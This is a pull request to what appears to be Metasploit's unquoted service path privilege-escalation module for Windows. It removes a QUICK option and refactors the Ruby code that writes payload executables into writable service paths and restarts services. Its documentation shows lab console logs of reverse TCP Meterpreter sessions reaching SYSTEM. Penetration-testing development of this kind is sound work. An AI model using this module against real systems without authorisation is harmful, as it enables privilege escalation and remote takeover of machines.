### PR TITLE
Remove the QUICK option altogether

### DIFF
--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -12,11 +12,11 @@ As is documented in that write-up, if the executable is C:\Program Files\A Subfo
 
 Windows will attempt to run the following, in order.
 
-  1.  C:\Program.exe
-  2.  C:\Program Files\A.exe
-  3.  C:\Program Files\A Subfolder\B.exe
-  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
-  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+1.  C:\Program.exe
+2.  C:\Program Files\A.exe
+3.  C:\Program Files\A Subfolder\B.exe
+4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
 
 To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
 In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
@@ -44,38 +44,31 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
 
 ## Verification Steps
 
-  1. Start msfconsole
-  2. Get a user shell
-  3. Do: ```use exploits/windows/local/unquoted_service_path```
-  4. Do: ```set session #```
-  5. Do: ```run```
-  6. You should get an elevated shell.
+1. Start msfconsole
+2. Get a user shell
+3. Do: `use exploits/windows/local/unquoted_service_path`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get an elevated shell.
 
 ## Options
 
-### QUICK
-
-Only exploit the first exploitable service.  `false` will exploit all exploitable service. Default is `true`
-
 ## Scenarios
 
-### Windows 10 (16299) with Service Listed Above
-
+### Windows 10 21H2
 
 ```
 msf6 exploit(windows/local/unquoted_service_path) > set session 1
 session => 1
 msf6 exploit(windows/local/unquoted_service_path) > set verbose true
 verbose => true
-msf6 exploit(windows/local/unquoted_service_path) > set lhost 1.1.1.1
+msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.159.128
 lhost => 1.1.1.1
 msf6 exploit(windows/local/unquoted_service_path) > set lport 9090
 lport => 9090
-msf6 exploit(windows/local/unquoted_service_path) > set quick false
-quick => false
 msf6 exploit(windows/local/unquoted_service_path) > exploit
 
-[*] Started reverse TCP handler on 1.1.1.1:9090 
+[*] Started reverse TCP handler on 192.168.159.128:9090 
 [*] Finding a vulnerable service...
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
@@ -90,91 +83,43 @@ msf6 exploit(windows/local/unquoted_service_path) > exploit
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: Some Vulnerable Service - c:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: Vuln Service 1 - C:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
 [*]   Enumerating vulnerable paths
-[-]     c:\Program Files\A Subfolder\B Subfolder\ is not writable
-[+]     c:\Program Files\A Subfolder\ is writable
-[-]     c:\Program Files\ is not writable
-[-]     c:\ is not writable
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[*] Attempting exploitation of Some Vulnerable Service
-[*] Placing c:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
-[*] Attempting to write 15872 bytes to c:\Program Files\A Subfolder\B.exe...
-[+] Manual cleanup of c:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
-[+] Successfully wrote payload
-[*] Launching service Some Vulnerable Service...
-[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
-[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
-[*] Waiting 303 seconds for shell to arrive
-[*] Sending stage (175686 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:9090 -> 2.2.2.2:49891) at 2022-12-23 12:29:11 -0500
-[*] Attempting to delete payload: c:\Program Files\A Subfolder\B.exe
+[-]     C:\Program Files\A Subfolder\B Subfolder\ is not writable
+[+]     C:\Program Files\A Subfolder\ is writable
+[*]       Placing C:\Program Files\A Subfolder\B.exe for Vuln Service 1
+[*]       Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 1] Restarting service
+[-] [Vuln Service 1] Restarting service failed: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-]       Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
+[-]     C:\Program Files\ is not writable
+[-]     C:\ is not writable
+[+] Found potentially vulnerable service: Vuln Service 2 - C:\Program Files\D Subfolder\E Subfolder\F Sub folder\SomeExecutable.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[-]     C:\Program Files\D Subfolder\E Subfolder\ is not writable
+[+]     C:\Program Files\D Subfolder\ is writable
+[*]       Placing C:\Program Files\D Subfolder\E.exe for Vuln Service 2
+[*]       Attempting to write 15872 bytes to C:\Program Files\D Subfolder\E.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 2] Restarting service
+[*] Sending stage (175686 bytes) to 192.168.159.87
+[+] [Vuln Service 2] Service started
+[+] Deleted C:\Program Files\A Subfolder\B.exe
+[+] Deleted C:\Program Files\D Subfolder\E.exe
+[*] Meterpreter session 12 opened (192.168.159.128:9090 -> 192.168.159.87:57944) at 2023-01-05 09:46:38 -0500
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-```
-
-### Windows 10 (18363), QUICK set to true
-
-```
-sf6 exploit(multi/script/web_delivery) > use exploit/windows/local/unquoted_service_path
-[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
-msf6 exploit(windows/local/unquoted_service_path) > set lhost 2.2.2.2
-lhost => 2.2.2.2
-msf6 exploit(windows/local/unquoted_service_path) > set lport 7777
-lport => 7777
-msf6 exploit(windows/local/unquoted_service_path) > set session 1
-session => 1
-msf6 exploit(windows/local/unquoted_service_path) > set verbose true
-verbose => true
-msf6 exploit(windows/local/unquoted_service_path) > exploit
-
-[*] Started reverse TCP handler on 2.2.2.2:7777 
-[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-[-] QUICK option is enabled. If an exploitable service is not found, try 'set QUICK false'.
-[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-[*] Finding a vulnerable service...
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: NetTcpPortSharing - C:\WINDOWS\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe (NT AUTHORITY\LocalService)
-[*]   Enumerating vulnerable paths
-[-]     C:\WINDOWS\Microsoft.NET\Framework64\v3.0\ is not writable
-[-] Ignoring unexploitable service
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: Video Stream - C:\Program Files\VideoStream\1337 Log\checklog.exe (LocalSystem)
-[*]   Enumerating vulnerable paths
-[+]     C:\Program Files\VideoStream\ is writable
-[*] Attempting exploitation of Video Stream
-[*] Placing C:\Program Files\VideoStream\1337.exe for Video Stream
-[*] Attempting to write 15872 bytes to C:\Program Files\VideoStream\1337.exe...
-[+] Manual cleanup of C:\Program Files\VideoStream\1337.exe is required due to a potential reboot for exploitation.
-[+] Successfully wrote payload
-[*] Launching service Video Stream...
-[*] Manual cleanup of the payload file is required. Video Stream will fail to start as long as the payload remains on disk.
-[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
-[*] Waiting 303 seconds for shell to arrive
-```
-
-Manually restart the service
-
-```
-[*] Sending stage (175686 bytes) to 1.1.1.1
-[*] Meterpreter session 2 opened (2.2.2.2:7777 -> 1.1.1.1:1727) at 2022-12-23 12:04:38 -0500
-[*] Attempting to delete payload: C:\Program Files\VideoStream\1337.exe
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-81CEH16
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > 
 ```

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Services
+  include Msf::Exploit::Retry
 
   def initialize(info = {})
     super(
@@ -59,24 +60,15 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    register_options([
-      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
-    ])
   end
 
   def check
-    quick_banner
-    services = enum_vuln_services
+    services = enum_vuln_services.map { |srv| srv['name'] }
     if services.empty?
       return CheckCode::Safe
     end
 
-    vulns = []
-    services.each do |srv|
-      vulns << srv['name']
-    end
-
-    CheckCode::Vulnerable("Exploitable services: #{vulns.join(', ')}")
+    CheckCode::Vulnerable("Vulnerable services: #{services.join(', ')}")
   end
 
   ###
@@ -90,12 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
   # C:\Program
   ###
 
-  def generate_folders(fpath)
+  def generate_folders(fpath, &block)
     potential_paths = []
     checked_paths = []
+    finished = false
     fpath.reverse.each do |x|
       path = fpath[0..fpath.index(x)].join(' ')
-      # when we test writability, we drop off last part since thats the file name
+      # when we test writability, we drop off last part since that is the file name
       path_no_file = path.split('\\')[0...-1].join('\\')
 
       next if checked_paths.include? path_no_file
@@ -106,14 +99,16 @@ class MetasploitModule < Msf::Exploit::Local
         next
       end
       vprint_good("    #{path_no_file}\\ is writable")
-      # include file name for the path
+
+      finished = block.call(path)
       potential_paths << path
-      return potential_paths if datastore['QUICK']
+      break if finished
     end
-    potential_paths
+
+    [potential_paths, finished]
   end
 
-  def enum_vuln_services
+  def enum_vuln_services(&block)
     vuln_services = []
 
     each_service do |service|
@@ -138,18 +133,13 @@ class MetasploitModule < Msf::Exploit::Local
       }
       fpath = cmd.split(' ')[0...-1] # cut off the .exe last portion
       vprint_status('  Enumerating vulnerable paths')
-      serv['paths'] = generate_folders(fpath)
-
-      # don't bother saving if we didn't find any vuln paths
-      if serv['paths'].empty?
-        vprint_error('Ignoring unexploitable service')
-      else
-        vuln_services << serv
+      serv['paths'], finished = generate_folders(fpath) do |path|
+        block.call(service[:name], path) if block_given?
       end
 
-      # This process can be pretty damn slow.
-      # Allow the user to just find one, and get the hell out.
-      break if !vuln_services.empty? && datastore['QUICK']
+      # don't bother saving if we didn't find any vuln paths
+      vuln_services << serv unless serv['paths'].empty?
+      break if finished
     end
 
     vuln_services
@@ -168,55 +158,45 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def quick_banner
-    return unless datastore['QUICK']
-
-    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
-    print_error('QUICK option is enabled. If an exploitable service is not found, try \'set QUICK false\'.')
-    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
-  end
-
   def exploit
-    quick_banner
     print_status('Finding a vulnerable service...')
-    svrs_list = enum_vuln_services
 
-    fail_with(Failure::NotVulnerable, 'No service found with trusted path issues') if svrs_list.empty?
-
-    svrs_list.each do |svrs|
-      print_status("Attempting exploitation of #{svrs['name']}")
+    @svc_exes = {}
+    enum_vuln_services do |svc_name, path|
       #
       # Drop the malicious executable into the path
       #
-      svrs['paths'].each do |path|
-        @exe_path = "#{path}.exe"
-        print_status("Placing #{@exe_path} for #{svrs['name']}")
-        exe = generate_payload_exe_service({ servicename: svrs['name'] })
-        print_status("Attempting to write #{exe.length} bytes to #{@exe_path}...")
-        write_file(@exe_path, exe)
-        print_good("Manual cleanup of #{@exe_path} is required due to a potential reboot for exploitation.")
-        print_good 'Successfully wrote payload'
-        #
-        # Run the service, let the Windows API do the rest
-        #
-        print_status("Launching service #{svrs['name']}...")
-        print_status("Manual cleanup of the payload file is required. #{svrs['name']} will fail to start as long as the payload remains on disk.")
-        begin
-          unless service_restart(svrs['name'])
-            print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
-          end
-        rescue RuntimeError # service_restart throws this error when it doesn't have permission
-          print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
-          print_status("Waiting #{wfs_delay} seconds for shell to arrive")
-        end
-        # break
+      exe_path = "#{path}.exe"
+      print_status("      Placing #{exe_path} for #{svc_name}")
+      exe = @svc_exes[svc_name] ||= generate_payload_exe_service({ servicename: svc_name })
+      print_status("      Attempting to write #{exe.length} bytes to #{exe_path}...")
+      write_file(exe_path, exe)
+      print_good '      Successfully wrote payload'
+      register_file_for_cleanup(exe_path)
+
+      #
+      # Run the service, let the Windows API do the rest
+      #
+      if service_restart(svc_name)
+        sleep 5 # sleep a bit if restarting the service succeeded to see if any sessions are created
+      else
+        print_error '      Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
       end
+
+      session_created? # propagated up to indicate if we're finished or not
     end
+
+    # if no exes were created, no vulnerable service paths were found
+    fail_with(Failure::NotVulnerable, 'No service found with trusted path issues') if @svc_exes.empty?
+
+    print_status("Waiting #{wfs_delay} seconds for shell to arrive") unless session_created?
   end
 
-  def cleanup
-    print_status "Attempting to delete payload: #{@exe_path}"
-    rm_f(@exe_path)
+  def service_restart(name)
+    print_status("[#{name}] Restarting service")
     super
+  rescue RuntimeError => e
+    print_error("[#{name}] Restarting service failed: #{e}")
+    false
   end
 end


### PR DESCRIPTION
This is more along the lines of what I had in mind to remove the QUICK option altogether. Now instead of enumerating all services / all paths and maybe stopping after the first one, each one is checked for exploitablity in sequence.

This also means that if there are multiple vulnerable services and the current user is able to restart one through a modified security descriptor and that service is not the first one that is tried the module will obtain a session immediately. If one or more paths are able to be written to, but no service restarts were successful, it'll still sleep for the 300 seconds you wanted.

Now we don't have to have the QUICK option at all so users don't have to choose between being fast and being thorough because...

![image](https://user-images.githubusercontent.com/58950994/210809931-f69f26a4-ac4a-4174-9b96-677f5276a8ab.png)
